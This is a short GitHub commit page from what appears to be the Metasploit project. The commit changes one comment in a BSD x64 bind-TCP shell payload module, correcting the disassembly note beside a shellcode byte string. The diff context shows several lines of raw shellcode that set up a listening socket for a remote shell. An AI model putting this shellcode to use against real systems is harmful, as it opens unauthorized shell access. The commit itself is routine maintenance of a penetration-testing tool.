Skip to content

Commit aa01383

Browse files
committed
Fix comment
1 parent 195418b commit aa01383

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -44,7 +44,7 @@ def initialize(info = {})
4444
"\x0f\x05" +# syscall #
4545
"\x48\x97" +# xchg %rax,%rdi #
4646
"\x52" +# push %rdx #
47-
"\xba\x00\x02\x11\x5C" +# mov edx,0x5c111c00 #
47+
"\xba\x00\x02\x11\x5C" +# mov edx,0x5c110200 #
4848
"\x52" +# push %rdx #
4949
"\x48\x89\xe6" +# mov %rsp,%rsi #
5050
"\x6a\x10" +# pushq $0x10 #

0 commit comments

Comments
 (0)